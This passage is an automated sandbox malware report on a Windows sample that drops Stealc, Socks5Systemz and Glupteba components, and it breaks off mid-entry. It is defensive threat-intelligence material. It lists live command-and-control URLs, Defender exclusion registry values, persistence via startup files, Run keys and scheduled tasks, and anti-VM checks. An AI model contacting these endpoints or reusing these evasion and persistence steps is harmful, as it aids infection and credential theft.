Analysis
-
max time kernel
862s -
max time network
862s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
12-03-2024 13:07
Static task
static1
General
-
Target
file.exe
-
Size
39KB
-
MD5
699e79d0f4a7586ffe53d0dabc5c0a5a
-
SHA1
7178ab85fe6190259b64846c76af01b8da5b0cd4
-
SHA256
b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
-
SHA512
56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526
-
SSDEEP
768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns
Malware Config
Extracted
stealc
http://185.172.128.145
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
socks5systemz
http://bghmfep.com/search/?q=67e28dd86d58f02d130da81f7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978a571ea771795af8e05c644db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608fff13c4e79c993d
Signatures
-
Glupteba payload 10 IoCs
resource yara_rule behavioral1/memory/688-113-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba behavioral1/memory/688-115-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/688-231-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba behavioral1/memory/688-248-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/688-529-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/688-539-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/19500-547-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/19500-1298-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/20712-1851-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/20712-2090-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oHE5OfAE7uZo5wM5zxGSo2Yh.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe -
Contacts a large (4190) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4416 netsh.exe -
Drops startup file 15 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMZ73wMzYBIGFtY0Dtx5TycW.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZSycrmoTPtnhPR7O2piBiomq.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UhOWm3bR6RESh6NculSg5dpk.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5DrxSoXwtg938SHmvxCDrt2H.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zoH4OECGTcIT0xdFQytq2MMG.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hP36JmBrt0aViG4GwvO6225d.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Y2wpU9Ny26ZERrmmkihlbLld.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ai3tlHn31efUkct6HI9gkY6B.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dFjX8WXWVm4vdOzYikrDfuGT.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W11Mh2Di3qTFZvf1aD7H4z7a.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TcYmft0LC42h6XXFTq7EwxeN.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3B9aAiSWh6RSdiq06PbJKgJJ.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gQsHAIoW33mESx921XSFlsMO.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\114HUw7HKIFYJ6dMgCwlzIgj.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7bmuPd1jMty47ieUU1uexinA.bat jsc.exe -
Executes dropped EXE 49 IoCs
pid Process 22060 aCVfJ427wn6CARWtL1GFkhK1.exe 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 4320 weblinkanalyzer.exe 2184 weblinkanalyzer.exe 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 5968 syncUpd.exe 9488 BroomSetup.exe 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 13676 CkelNmqDwew6WPNzMTNOQeqx.exe 14428 CkelNmqDwew6WPNzMTNOQeqx.exe 14960 CkelNmqDwew6WPNzMTNOQeqx.exe 15204 CkelNmqDwew6WPNzMTNOQeqx.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 20712 csrss.exe 22252 injector.exe 21240 windefender.exe 9960 windefender.exe 20248 HIIEBAFCBK.exe 6864 Assistant_108.0.5067.20_Setup.exe_sfx.exe 11556 assistant_installer.exe 15312 assistant_installer.exe 20592 HIIEBAFCBK.exe 6200 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 8040 713674d5e968cbe2102394be0b2bae6f.exe 1888 1bf850b4d9587c1017a75a47680584c4.exe 10020 uU0jFy7gS9hEAPMIe43bhoBX.exe 11644 3hR8i08CkrUYFyeQRQrcPsfW.exe 11796 syncUpd.exe 20496 uU0jFy7gS9hEAPMIe43bhoBX.exe 13620 sO7J9X3BBbRMGvIrK0o2MAfH.exe 13668 o80VeACipQO1BsWWJMh5Q0G4.exe 13716 o80VeACipQO1BsWWJMh5Q0G4.exe 13736 sO7J9X3BBbRMGvIrK0o2MAfH.tmp 13848 o80VeACipQO1BsWWJMh5Q0G4.exe 4160 0O4uZyUrqIFSEpTeH1H0rg8K.exe 4700 bhJRGCgBFLmbnysHYxZIy2UZ.exe 2780 bhJRGCgBFLmbnysHYxZIy2UZ.tmp 5892 kL5MaQu7jAAGIFgNQb6ujSPo.exe 6012 0O4uZyUrqIFSEpTeH1H0rg8K.exe 1284 syncUpd.exe 7892 RAus8SFt5ecM23w4L2GQk0YC.exe 7944 RAus8SFt5ecM23w4L2GQk0YC.exe 6392 RAus8SFt5ecM23w4L2GQk0YC.exe 11600 BroomSetup.exe 12044 weblinkanalyzer.exe 12612 weblinkanalyzer.exe 13360 weblinkanalyzer.exe 13392 weblinkanalyzer.exe -
Loads dropped DLL 29 IoCs
pid Process 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 13676 CkelNmqDwew6WPNzMTNOQeqx.exe 14428 CkelNmqDwew6WPNzMTNOQeqx.exe 14960 CkelNmqDwew6WPNzMTNOQeqx.exe 15204 CkelNmqDwew6WPNzMTNOQeqx.exe 5968 syncUpd.exe 5968 syncUpd.exe 22124 taskmgr.exe 11556 assistant_installer.exe 11556 assistant_installer.exe 15312 assistant_installer.exe 15312 assistant_installer.exe 11644 3hR8i08CkrUYFyeQRQrcPsfW.exe 11644 3hR8i08CkrUYFyeQRQrcPsfW.exe 11644 3hR8i08CkrUYFyeQRQrcPsfW.exe 13668 o80VeACipQO1BsWWJMh5Q0G4.exe 13716 o80VeACipQO1BsWWJMh5Q0G4.exe 13848 o80VeACipQO1BsWWJMh5Q0G4.exe 13736 sO7J9X3BBbRMGvIrK0o2MAfH.tmp 2780 bhJRGCgBFLmbnysHYxZIy2UZ.tmp 5892 kL5MaQu7jAAGIFgNQb6ujSPo.exe 5892 kL5MaQu7jAAGIFgNQb6ujSPo.exe 5892 kL5MaQu7jAAGIFgNQb6ujSPo.exe 7892 RAus8SFt5ecM23w4L2GQk0YC.exe 7944 RAus8SFt5ecM23w4L2GQk0YC.exe 6392 RAus8SFt5ecM23w4L2GQk0YC.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000600000001ac25-127.dat upx behavioral1/memory/9488-128-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/files/0x000600000001ac29-202.dat upx behavioral1/memory/12036-210-0x00000000009A0000-0x0000000000ED8000-memory.dmp upx behavioral1/files/0x000600000001ac29-212.dat upx behavioral1/files/0x000600000001ac29-213.dat upx behavioral1/memory/13676-224-0x00000000009A0000-0x0000000000ED8000-memory.dmp upx behavioral1/files/0x000600000001ac29-234.dat upx behavioral1/memory/14428-230-0x0000000000290000-0x00000000007C8000-memory.dmp upx behavioral1/files/0x000600000001ac37-226.dat upx behavioral1/memory/14960-239-0x00000000009A0000-0x0000000000ED8000-memory.dmp upx behavioral1/memory/15204-249-0x00000000009A0000-0x0000000000ED8000-memory.dmp upx behavioral1/memory/9488-253-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/files/0x000700000001ac62-2100.dat upx behavioral1/files/0x000600000001ad4b-4149.dat upx behavioral1/files/0x000600000001af9a-6479.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 45.155.250.90 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oHE5OfAE7uZo5wM5zxGSo2Yh.exe = "0" oHE5OfAE7uZo5wM5zxGSo2Yh.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\HIIEBAFCBK.exe" HIIEBAFCBK.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\HIIEBAFCBK.exe" HIIEBAFCBK.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 8 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: CkelNmqDwew6WPNzMTNOQeqx.exe File opened (read-only) \??\D: CkelNmqDwew6WPNzMTNOQeqx.exe File opened (read-only) \??\F: CkelNmqDwew6WPNzMTNOQeqx.exe File opened (read-only) \??\D: o80VeACipQO1BsWWJMh5Q0G4.exe File opened (read-only) \??\F: o80VeACipQO1BsWWJMh5Q0G4.exe File opened (read-only) \??\D: RAus8SFt5ecM23w4L2GQk0YC.exe File opened (read-only) \??\F: RAus8SFt5ecM23w4L2GQk0YC.exe File opened (read-only) \??\D: CkelNmqDwew6WPNzMTNOQeqx.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow ioc 7612 pastebin.com 9003 raw.githubusercontent.com 9005 raw.githubusercontent.com 3150 raw.githubusercontent.com 7203 pastebin.com 7233 pastebin.com 7249 pastebin.com 7610 pastebin.com 9006 raw.githubusercontent.com 9004 raw.githubusercontent.com 14292 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7788 api.ipify.org 14436 api.ipify.org -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4044 set thread context of 17632 4044 file.exe 75 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN oHE5OfAE7uZo5wM5zxGSo2Yh.exe File opened (read-only) \??\VBoxMiniRdrDN uU0jFy7gS9hEAPMIe43bhoBX.exe File opened (read-only) \??\VBoxMiniRdrDN 0O4uZyUrqIFSEpTeH1H0rg8K.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File opened for modification C:\Windows\rss oHE5OfAE7uZo5wM5zxGSo2Yh.exe File created C:\Windows\rss\csrss.exe oHE5OfAE7uZo5wM5zxGSo2Yh.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9824 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000600000001ac1e-97.dat nsis_installer_2 behavioral1/files/0x000e00000001aaa8-3815.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2552 schtasks.exe 5448 schtasks.exe 5448 schtasks.exe 21464 schtasks.exe 14436 schtasks.exe 13948 schtasks.exe -
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 7473 Go-http-client/1.1 HTTP User-Agent header 7589 Go-http-client/1.1 HTTP User-Agent header 7607 Go-http-client/1.1 HTTP User-Agent header 18102 Go-http-client/1.1 HTTP User-Agent header 18111 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-571 = "China Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" windefender.exe Set value (str) 